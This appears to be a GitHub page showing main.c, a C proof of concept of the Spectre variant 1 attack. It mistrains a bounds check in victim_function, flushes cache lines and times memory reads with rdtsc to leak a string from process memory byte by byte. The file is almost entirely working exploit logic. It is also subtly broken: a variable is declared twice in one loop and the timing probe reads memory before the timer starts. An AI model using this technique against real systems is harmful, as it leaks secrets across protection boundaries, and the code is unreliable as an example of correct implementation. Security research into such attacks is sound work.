-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathmain.c
More file actions
133 lines (117 loc) · 3.8 KB
/
main.c
File metadata and controls
133 lines (117 loc) · 3.8 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <x86intrin.h>
#include <limits.h>
#include <string.h>
#define TRAINING_ITERS 100
#define COEFF 10 // training to malicious
#define STAT_ITERS 1000
#define CACHE_LINE 1024
#define CHAR_SIZE 256
long long array1_len = 16;
uint8_t array1[16];
uint8_t array2[CHAR_SIZE * CACHE_LINE];
size_t temp = 0;
long long min = 0;
void victim_function(long long x) {
if (min <= x && x < array1_len) {
temp = array2[array1[x] * CACHE_LINE];
}
}
// victim_function(x) is function which we are going to abuse
void latency() {
for (int i = 0; i < 1000; i++);
}
int main(int argc, char *argv[]) {
FILE *out;
char *hidden;
if (2 <= argc && argc <= 3) {
hidden = argv[1];
if (argc == 3) {
out = fopen(argv[2], "w");
if (out == NULL) {
printf("Cannot open file.");
return 0;
}
}
} else {
printf("Usage: ./a.out <data> [<filename>]");
return 0;
}
size_t hidden_len = strlen(hidden) + 1;
int stat[hidden_len][CHAR_SIZE];
char found[hidden_len];
int max[hidden_len];
for (int i = 0; i < hidden_len; i++) {
max[i] = -1;
}
for (int i = 0; i < hidden_len; i++) {
for (int j = 0; j < CHAR_SIZE; j++) stat[i][j] = 0;
}
for (int global = 0; global < STAT_ITERS; global++) {
for (int i = 0; i < array1_len; i++) array1[i] = i + 1;
for (int i = 0; i < CHAR_SIZE * CACHE_LINE; i++) array2[i] = 1;
long long dest = (long long) (hidden - 1 - (char *) array1);
for (size_t iter = 0; iter < hidden_len; iter++) {
unsigned long long min_time = ULLONG_MAX;
uint8_t val = 0;
for (size_t i = 0; i < CHAR_SIZE; i++) {
_mm_clflush(&array2[i * CACHE_LINE]);
}
int training_x = iter % array1_len;
for (int i = TRAINING_ITERS - 1; i >= 0; i--) {
_mm_clflush(&min);
_mm_clflush(&array1_len);
long long cur_val = i % COEFF == 0 ? dest : training_x;
for (volatile int j = 0; j < 100; j++) {}
victim_function(cur_val);
}
_mm_clflush(&array2[0]);
_mm_clflush(&array2[array1[training_x] * CACHE_LINE]);
dest++;
latency();
unsigned int junk = 1;
uint8_t mn = 255;
for (size_t i = 0; i < CHAR_SIZE; i++) {
uint8_t contr_opt = (i * 31 + 17) & 255;
unsigned long long time_start = __rdtsc() * junk;
junk = array2[contr_opt * CACHE_LINE];
latency();
unsigned long long time_start = __rdtsc() * junk;
latency();
junk = array2[contr_opt * CACHE_LINE];
latency();
unsigned long long time = __rdtsc() * junk - time_start;
if (min_time > time) {
min_time = time;
mn = contr_opt;
}
}
stat[iter][mn]++;
}
}
for (int i = 0; i < hidden_len; i++) found[i] = 0;
for (int i = 0; i < hidden_len; i++) {
for (unsigned int j = 0; j < CHAR_SIZE; j++) {
if (stat[i][j] > max[i]) {
found[i] = j;
max[i] = stat[i][j];
}
}
}
if (argc == 2) {
printf("answer: %s\n", found + 1);
for (size_t i = 1; i < hidden_len; i++) {
printf("char: %c, hits: %i/%i\n", found[i], max[i], STAT_ITERS);
}
} else {
fprintf(out, "answer: %s\n", found + 1);
for (size_t i = 1; i < hidden_len; i++) {
fprintf(out, "char: %c, hits: %i/%i\n", found[i], max[i], STAT_ITERS);
}
fclose(out);
}
fflush(stdout);
return 0;
}